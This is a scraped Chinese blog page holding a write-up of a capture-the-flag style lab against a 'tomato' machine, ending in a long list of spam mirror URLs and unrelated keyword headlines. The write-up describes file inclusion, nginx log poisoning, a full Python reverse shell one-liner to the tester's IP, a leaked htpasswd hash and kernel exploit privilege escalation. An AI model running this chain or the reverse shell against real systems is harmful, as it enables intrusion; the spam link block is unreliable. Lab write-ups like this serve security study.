当前位置: 首页 > news >正文

移动端网站开发哪家好做淘宝客需要自己建网站吗

移动端网站开发哪家好,做淘宝客需要自己建网站吗,seo优化推荐,wordpress 经典博客主题难度 低(个人认为中) 目标 root权限 一个flag 使用VMware启动 kali 192.168.152.56 靶机 192.168.152.66 信息收集 端口信息收集 可以看到有个ftp服务#xff0c;2211实际是ssh协议端口#xff0c;80、8888是一个web服务 web测试 80端口显示一个tomato 查看源码给了一些…难度 低(个人认为中) 目标 root权限 一个flag 使用VMware启动 kali 192.168.152.56 靶机 192.168.152.66 信息收集 端口信息收集 可以看到有个ftp服务2211实际是ssh协议端口80、8888是一个web服务 web测试 80端口显示一个tomato 查看源码给了一些提示 先上dirseardh扫一遍 然后用gobuster的中等字典扫了一下也没有结果 8888端口需要密码登录 可能和前面给的一些提示有关 然后使用cewl命令爬取一下这个页面搞了个字典用hydra爆破了一下这个8888端口的服务发现也没有结果然后又爆破了一下ftp和ssh服务也没有结果 可能是字典不行换字典继续跑把kali的自带的seclectlist下面目录字典使用gobuster跑完了都没跑出来任何东西 看wp用dirb的可以跑出一个目录出来 以后打靶场没思路的时候把所有扫描工具全部上一遍。。。 用的这个的字典/usr/share/dirb/wordlists/common.txt。。。 进去可以看到一些源码内容 把能点的全部浏览了除了这三个图片还有两个txt和info.php其他都是空白没有其他有效的消息了 看着readme这个网站好像是一个wordpress的一个网站机器人插件用来反爬虫的 突破边界 我以为是要根据这个readme中的内容去官网找源码。。。我搞好了半天都没找到突破点 看了wp看info.php的源码。。。 做这种题只想暴打出题人到底是在打靶场还是打ctf 看到疑似加载本地资源的参数考虑是否存在任意文件读取php语言考虑文件包含以及搭配利用各种伪协议 通过信息可以看到这个tomato用户存在 然后继续利用这个文件包含尝试了一些可以命令执行的伪协议没有什么反应然后看能不能加载远程文件 但是查看信息发现allow_url_include为off只有下面两个都为on才支持远程文件包含 那么是否可以尝试包含session文件或者日志文件 经过我的尝试确定了日志文件的路径一些apache和nginx的路径去猜一下 /var/log/nginx/access.log 并且这个日志记录的是8888端口的访问记录就那个登录的包修改一些UA 可以看到记录也出现了 那么我们写一段php代码进去然后包含这个日志文件看执不执行 可以看到成功的执行了 那么可以直接写反弹shell的命令进行shell的反弹了 但是搞了半天没成功我不知道是不是里面有什么编码的问题写多了搞得这个日志都记录不进去了。只能换个日志选择nginx的错误日志同时在nginx的错误日志中发现了这个8888登录在使用/etc/nginx/.htpasswd文件中的内容进行判断然后读取这个文件读到了账号密码 ngnix:$apr1$azDw/Iwv$E7rIlqjeiX9Sx9.sMCcAZ0 拿这个密码去CMD5网站解密发现要钱。。算了还是继续文件包含吧 换了个文件成功的包含了 /var/log/nginx/error.log 这个文件会包含所有登录失败的请求路径和host那么这里修改host 成功的回显了数据 能稳定执行命令后尝试使用各种方式方式反弹shell最后使用python成功的吧shell反弹了回来 python3 -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.152.56,7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(/bin/bash) 拿到shell发现是www的权限 因为是直接使用python的pty反弹的所以已经是比较高级的shell了 提权 然后先上个信息收集的脚本linpeas.sh 一上来就是爆红 小于4.6的内核都可以考虑脏牛提权CVE-2016-5195 尝试脏牛然后发现靶机上面缺少了一些环境。。。这种情况最麻烦了 然后去找其他的利用方式 发现基本上使用c编译成的exp都会受限应该是在kali上面进行gcc用了靶机没有的东西 strings /lib/x86_64-linux-gnu/libc.so.6 |grep GLIBC_ 环境上最高才2.23只能下载一个带有低版本GLIBC的包然后gcc的使用这个包里的来编译下载2.1x的包就刚好 wget http://launchpadlibrarian.net/172657656/libc6_2.19-0ubuntu6_amd64.deb 然后使用dpkg -x解压 这里不用脏牛了用上面检测出的第二个 把这个c文件cp到当前目录 gcc 45010.c -o exp -Ldir ./libc6_2.19-0ubuntu6_amd64/lib/x86_64-linux-gnu/libc.so.6 然后上传上去赋予权限成功的提权 拿到flag 这种环境的原因真的好麻烦。另外内核漏洞的一些poc可以在这里找 GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合
文章转载自:
http://www.morning.fdrwk.cn.gov.cn.fdrwk.cn
http://www.morning.wslpk.cn.gov.cn.wslpk.cn
http://www.morning.mszwg.cn.gov.cn.mszwg.cn
http://www.morning.ndyrb.com.gov.cn.ndyrb.com
http://www.morning.dmzqd.cn.gov.cn.dmzqd.cn
http://www.morning.nrll.cn.gov.cn.nrll.cn
http://www.morning.wnnfh.cn.gov.cn.wnnfh.cn
http://www.morning.pmtky.cn.gov.cn.pmtky.cn
http://www.morning.ddqdl.cn.gov.cn.ddqdl.cn
http://www.morning.wxfjx.cn.gov.cn.wxfjx.cn
http://www.morning.qkxt.cn.gov.cn.qkxt.cn
http://www.morning.fjzlh.cn.gov.cn.fjzlh.cn
http://www.morning.jgnjl.cn.gov.cn.jgnjl.cn
http://www.morning.dpfr.cn.gov.cn.dpfr.cn
http://www.morning.ctxt.cn.gov.cn.ctxt.cn
http://www.morning.pbmkh.cn.gov.cn.pbmkh.cn
http://www.morning.grxsc.cn.gov.cn.grxsc.cn
http://www.morning.ckfqt.cn.gov.cn.ckfqt.cn
http://www.morning.zqfz.cn.gov.cn.zqfz.cn
http://www.morning.nrrzw.cn.gov.cn.nrrzw.cn
http://www.morning.fksdd.cn.gov.cn.fksdd.cn
http://www.morning.smj79.cn.gov.cn.smj79.cn
http://www.morning.dmcxh.cn.gov.cn.dmcxh.cn
http://www.morning.prysb.cn.gov.cn.prysb.cn
http://www.morning.rdwm.cn.gov.cn.rdwm.cn
http://www.morning.rjqtq.cn.gov.cn.rjqtq.cn
http://www.morning.sgfgz.cn.gov.cn.sgfgz.cn
http://www.morning.rntyn.cn.gov.cn.rntyn.cn
http://www.morning.jjnry.cn.gov.cn.jjnry.cn
http://www.morning.tgfsr.cn.gov.cn.tgfsr.cn
http://www.morning.wktbz.cn.gov.cn.wktbz.cn
http://www.morning.xrwtk.cn.gov.cn.xrwtk.cn
http://www.morning.pxjp.cn.gov.cn.pxjp.cn
http://www.morning.bmtkp.cn.gov.cn.bmtkp.cn
http://www.morning.dtcsp.cn.gov.cn.dtcsp.cn
http://www.morning.nzzws.cn.gov.cn.nzzws.cn
http://www.morning.xsrnr.cn.gov.cn.xsrnr.cn
http://www.morning.wtwhj.cn.gov.cn.wtwhj.cn
http://www.morning.syglx.cn.gov.cn.syglx.cn
http://www.morning.fldrg.cn.gov.cn.fldrg.cn
http://www.morning.zrnph.cn.gov.cn.zrnph.cn
http://www.morning.yrbp.cn.gov.cn.yrbp.cn
http://www.morning.litao4.cn.gov.cn.litao4.cn
http://www.morning.hdrsr.cn.gov.cn.hdrsr.cn
http://www.morning.hytr.cn.gov.cn.hytr.cn
http://www.morning.qnhcx.cn.gov.cn.qnhcx.cn
http://www.morning.hwycs.cn.gov.cn.hwycs.cn
http://www.morning.wjrtg.cn.gov.cn.wjrtg.cn
http://www.morning.qjzgj.cn.gov.cn.qjzgj.cn
http://www.morning.bqwrn.cn.gov.cn.bqwrn.cn
http://www.morning.znrlg.cn.gov.cn.znrlg.cn
http://www.morning.llcgz.cn.gov.cn.llcgz.cn
http://www.morning.wbqt.cn.gov.cn.wbqt.cn
http://www.morning.txzqf.cn.gov.cn.txzqf.cn
http://www.morning.tjwlp.cn.gov.cn.tjwlp.cn
http://www.morning.mhrzd.cn.gov.cn.mhrzd.cn
http://www.morning.xqmd.cn.gov.cn.xqmd.cn
http://www.morning.jfxth.cn.gov.cn.jfxth.cn
http://www.morning.bsgfl.cn.gov.cn.bsgfl.cn
http://www.morning.zqsnj.cn.gov.cn.zqsnj.cn
http://www.morning.jcfqg.cn.gov.cn.jcfqg.cn
http://www.morning.tkcct.cn.gov.cn.tkcct.cn
http://www.morning.kqqk.cn.gov.cn.kqqk.cn
http://www.morning.kwqt.cn.gov.cn.kwqt.cn
http://www.morning.ccyns.cn.gov.cn.ccyns.cn
http://www.morning.stmkm.cn.gov.cn.stmkm.cn
http://www.morning.ztcxx.com.gov.cn.ztcxx.com
http://www.morning.amonr.com.gov.cn.amonr.com
http://www.morning.brhxd.cn.gov.cn.brhxd.cn
http://www.morning.gnlyq.cn.gov.cn.gnlyq.cn
http://www.morning.dwmtk.cn.gov.cn.dwmtk.cn
http://www.morning.ckhyj.cn.gov.cn.ckhyj.cn
http://www.morning.nkpls.cn.gov.cn.nkpls.cn
http://www.morning.rryny.cn.gov.cn.rryny.cn
http://www.morning.mrfnj.cn.gov.cn.mrfnj.cn
http://www.morning.xsbhg.cn.gov.cn.xsbhg.cn
http://www.morning.zkdbx.cn.gov.cn.zkdbx.cn
http://www.morning.qhln.cn.gov.cn.qhln.cn
http://www.morning.rccbt.cn.gov.cn.rccbt.cn
http://www.morning.kyzxh.cn.gov.cn.kyzxh.cn
http://www.tj-hxxt.cn/news/260952.html

相关文章:

  • 外贸企业的网站建设dns加网站
  • 国外购物网站排行榜网站调用微信数据
  • 西安网站建设建站系统iis 配置网站 404页面
  • 网站建设技术jsp课程设计网页设计主要做什么工作
  • 网站建设昆山花桥想学网络营销怎么学
  • 公司响应式网站建设报价wordpress logo制作
  • 建设网站要准备什么建站边检站
  • 购物网站建设咨询WordPress文章登录后可看
  • 南京cms建站系统wordpress wpinc
  • 做付费网站好网站建设费用明细
  • 网站网页设计有哪些wordpress和jwplayer
  • 免费手机h5模板网站模板成品网页
  • 外贸网站做的作用是什么笑话类网站 源代码
  • 网站前台代码淘宝网页版本
  • 没有网站怎么做百度竞价wordpress 多语言 切换
  • 豆瓣网站模板漯河小学网站建设
  • 网站制作企长清网站建设费用
  • 携程网站 建设平台分析apicloud安装wordpress
  • 惠州网站公司炫酷网站推荐
  • 网站推广方式大全中国建筑装饰网注册用户名
  • 优质的广州做网站wordpress 学院主题
  • flash网站代做网站建设经营服务合同范本
  • 宁波制作网站哪个好做电子商务平台网站
  • 贵安新区住房和城乡建设厅网站长沙第三方网站建设公司
  • php 网站 项目酒店管理专业建设规划
  • 网站如何进行推广重庆安全监督工程信息网
  • 建行官网官网网站吗河南企业网站排名优化
  • 做网站用的编程语言做哪一类的网站可以短时间变现
  • 外贸网站商城建设原型图怎么做网站交互
  • 东莞网站建设服务商工程公司账务处理分录